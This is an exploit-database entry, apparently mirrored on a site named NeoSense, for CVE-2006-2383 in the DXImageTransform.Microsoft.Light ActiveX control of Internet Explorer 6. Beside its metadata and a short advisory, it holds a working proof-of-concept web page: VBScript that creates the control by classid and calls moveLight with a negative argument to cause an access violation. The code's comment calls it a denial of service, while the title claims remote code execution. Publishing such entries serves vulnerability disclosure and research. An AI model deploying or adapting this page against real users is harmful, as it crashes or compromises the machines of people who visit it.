[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution

Author: Will Dormann
type: remote
platform: windows
port: 
date_added: 2006-06-13 
date_updated: 2013-08-31 
verified: 1 
codes: CVE-2006-2383;OSVDB-26444 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/18303/info

The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution.

An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.

<!--
MS Internet Explorer 6 DirectX Media DoS Vulnerability
DLL: dxtmsft.dll

Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)

Description:
Sub moveLight (
 	ByVal lightNum  As Long ,
 	ByVal x  As Long ,
 	ByVal y  As Long ,
 	ByVal z  As Long ,
 	ByVal fAbsolute  As Long
)
Supplying negative parameters throws an access violation.
-->

<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
	Unable to create object
</object>

<script language="vbscript">
	Sub go
		DXTLight.moveLight "-1", "1", "1", "1", "1"
	End Sub
</script>
<input language=VBScript type="button" value="Try me" onclick="go()">
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.